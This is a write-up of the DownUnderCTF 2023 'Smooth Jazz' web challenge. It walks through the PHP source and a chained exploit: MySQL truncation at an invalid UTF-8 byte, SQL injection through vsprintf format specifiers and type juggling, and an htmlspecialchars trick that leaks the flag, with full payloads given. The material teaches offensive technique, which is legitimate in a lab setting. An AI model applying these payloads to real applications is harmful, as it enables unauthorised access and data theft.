DownUnderCTF 2023: Smooth Jazz (Web)

2023-09-05

Even though I couldn’t solve this challenge during the DownUnderCTF competition, I’ve discovered many interesting things and I’ve found it very informative. So I’ve decided to do a writeup to analyze the challenge and to better understand the intended solution.

The challenge

The challenge is about a simple PHP application that allows (only) the admin to log in to the system (and listen to some smooth jazz in the meantime :D ).

The code of the index.php file is all we need:

<?php
function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

if (isset($_POST['username']) && isset($_POST['password'])) {
  $mysqli = mysqli_connect('db', 'challuser', 'challpass', 'challenge');
  $username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);

  $password = sha1($_POST['password']);

  $res = mysql_fquery($mysqli, 'SELECT * FROM users WHERE username = "%s"', [$username]);

  if (!mysqli_fetch_assoc($res)) {
     $message = "Username not found.";
     goto fail;
  }
  $res = mysql_fquery($mysqli, 'SELECT * FROM users WHERE username = "'.$username.'" AND password = "%s"', [$password]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Invalid password.";
     goto fail;
  }
  $htmlsafe_username = htmlspecialchars($username, ENT_COMPAT | ENT_SUBSTITUTE);
  $greeting = $username === "admin"
      ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
      : "Hello $htmlsafe_username, the server time is %s";

  $message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);

  fail:
}
?>
<!DOCTYPE html>
<html>
<head>
  <title>🎷 Smooth Jazz</title>
  <style>
   ...
   ...
  </style>
</head>
<body>
  <div class="container">
    <h1>Smooth Jazz</h1>
    <form method="post">
      <label for="username">Username:</label>
      <input type="text" id="username" name="username" placeholder="Enter your username">

      <label for="password">Password:</label>
      <input type="password" id="password" name="password" placeholder="Enter your password">

      <input type="submit" value="Login">
    </form>
    <div class="music-player">
      <audio src="/offering-larry-stephens.mp3" id="audio"></audio>
      If you are stuck, you can <a href="javascript:document.getElementById('audio').play()">listen to some smooth jazz</a>.
    </div>
    <div id="message" class="message">
      <p><?= $message ?? '' ?></p>
    </div>
  </div>
</body>
</html>

We can immediately notice that:

  • in order to get the flag (which is stored in the FLAG environment variable), we need to login as admin
  • the username and password are provided via the POST parameters username and password (which is immediately hashed with sha1) and then checked with a couple of SQL database queries
    • the first query only checks that the provided username exists in the database (we know that only the user admin exists because the challenge also provided the SQL initialization script)
    • before executing the query, some sanitization is applied to the provided username (the symbols " and \ are escaped with \" and \\) by the strtr function
    • then our sanitized input is passed to a mysql_fquery function which basically uses vsprintf to format the SQL query and execute it
    • if the previous query returned at least 1 result, another mysql_fquery is executed: this time with the (hashed) password as parameter
    • if we got a valid raw for the previous query, htmlspecialchars is applied to the username and if the username is equal to admin we can finally get the flag, otherwise we should only get the system time

Bypassing the first check

So we have many problems to overcome. We clearly need to perform some SQL injection to pass the checks and get the flag. However, it doesn’t seem a simple task. The username parameter is properly sanitized against SQL injection (the " character is escaped and it is required to get a working SQL injection in this context). Also, the password parameter is immediately hashed so there is no immediate way to escape the " and get the injection.

Here is were I discovered something unexpected: if you pass an invalid UTF-8 character, MySQL will automatically truncate the string from the invalid character up until the end. This happens when you are using utf8 encoding as character set for your database. A detailed explanation of this issue can be found here.

This means that both the following POST data payloads will pass the first check:

POST / HTTP/1.1
Host: challenge-hostname
...
Connection: close

username=admin&password=asasa
POST / HTTP/1.1
Host: challenge-hostname
...
Connection: close

username=admin%ffwhatever_you_want_here&password=asasa

The username payload admin%ffwhatever_you_want_here will be truncated by MySQL to admin, hence we can pass the first check and being able to pass additional data to our username payload.

Exploit vsprintf to get SQL injection

Now our payload will run against this additional check:

$res = mysql_fquery($mysqli, 'SELECT * FROM users WHERE username = "'.$username.'" AND password = "%s"', [$password]);
if (!mysqli_fetch_assoc($res)) {
     $message = "Invalid password.";
     goto fail;
}

We clearly need to leverage the vsprintf formatting features to bypass it. To understand how this is possible, we first need to understand how vsprintf works.

vsprintf it’s similar to sprintf but takes a format and an array of values and returns a string formatted accordingly.

We can use an interactive PHP shell (with the command php -a ) to see how vsprintf works. For example the following code:

echo vsprintf("%s-%s-%c-%s", ["This","is","97","string"]);

returns the string “This-is-a-string”.

Notice how we used the specifier %c to get the ASCII value of the integer we passed in (in this case 97, the third value of the array).

Also, vsprintf allows us to specify the number of the argument to use for the format string (using the number argument followed by the $). For example:

echo vsprintf("Second character: %2\$c. First character: %1\$c",["97", "98"]);

will print:

Second character: b. First character: a

Notice that we had to use a \ to escape the $ sign because otherwise the interactive PHP shell would try to resolve $c as variable and this will throw an exception. However we don’t need to escape the $ in our payload (it’s just part of the string returned by $_POST["username"]).

PHP type-juggling

Now that we know how to exploit the vsprintf to get arbitrary characters, we need to perform our SQL injection in the following query:

mysql_fquery($mysqli, 'SELECT * FROM users WHERE username = "'.$username.'" AND password = "%s"', [$password]);

This means that if we could get the double quote ", we can escape the string context and perform SQL injection. But there is a problem: the argument of our format specifier will be the sha1 of our input password.

However, due to PHP implicit conversion (often referred as type-juggling) any string that starts with a number, is converted to a numeric value when used in a context of numeric operations. For example:

echo 2 + "34this_is_not_a_number"

will result in 36.

So we can just find a password for which the corresponding sha1 hash starts with the digits 34 (the ASCII code for the double quote). For example sha1("pwvi") is equal to 34d034acfe28b90dc5ee27d1e47d6c9f91bd7faa and we can build the following payload to escape from the string context and perform SQL injection (notice that we added a # to comment out the remaining part and to avoid breaking the SQL query):

POST / HTTP/1.1
Host: challenge-hostname
...
Connection: close

username=admin%ff%1$'%c#&password=pwvi

Cool right?? Well, not really..

The problem is that even if now we can exfiltrate the admin password, it will still be a sha1 hash and getting the original value would require to brute force it, which is not clearly the way we need to solve the challenge.

So we need to go ahead and find a different way.

Using htmlspecialchars to build 2 payloads in 1

Looking at the following piece of code:

 $htmlsafe_username = htmlspecialchars($username, ENT_COMPAT | ENT_SUBSTITUTE);
  $greeting = $username === "admin"
      ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
      : "Hello $htmlsafe_username, the server time is %s";

  $message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);

we see that it’s just not possible to satisfy the condition username === "admin" because we already “smuggled” the username to pass the previous checks. So we need to take the second branch, the one that will set greeting with the string "Hello $htmlsafe_username, the server time is %s" where $htmlsafe_username is our username payload after been “sanitized” by htmlspecialchars.

Since greeting is used again to format the message with vsprintf, we could simply replicate the same technique we did before, just by adding another format specifier (%2$s which would grab the value at the 2nd position, which is the flag) to our username. We could do something like:

username=admin%ff%1$c#%2$s

But unfortunately this will not pass the first call to vsprintf because we are providing a format string with 2 specifiers while the array of values only provide 1 argument, and this will cause an error in the PHP backend.

And now it’s where things start to get a little bit crazy.. Basically we can leverage the htmlspecialchars sanitization to achieve our goal..

As a matter of fact, what happens if we use the following payload?

%1$'>%2$s

The previous payload can be interpreted in 2 different ways:

  • before the htmlspecialchars is called, it is interpreted as:

    • %1$'>% : takes the parameter at position 1, using the value > as padding character ('(char) is an optional flag in vsprintf that can be use for padding). It basically returns the character % (which is a valid specifier)
    • the remaining part is just the row string 2$s
  • after htmlspecialchars is called, the string is converted to %1$'&gt;%2$s and it is interpreted as:

    • %1$'&g takes the argument from position 1 (the value returned by date), uses & as padding and uses the g specifier (a general format specifier for a floating-point number)
    • t; is just the raw string t;
    • %2$s takes the argument from position 2 (the flag!)

So basically by leveraging the htmlspecialchars sanitization, it’s possible to build a format string that is different before and after htmlspecialchars is applied to our input!

The final payload to get the flag is:

username=admin%ff%1$c#%1$'>%2$s&password=pwvi

which reveals the flag (and some additional garbage that you can just ignore):

DUCTF{at_least_you_can_enjoy_the_jazz}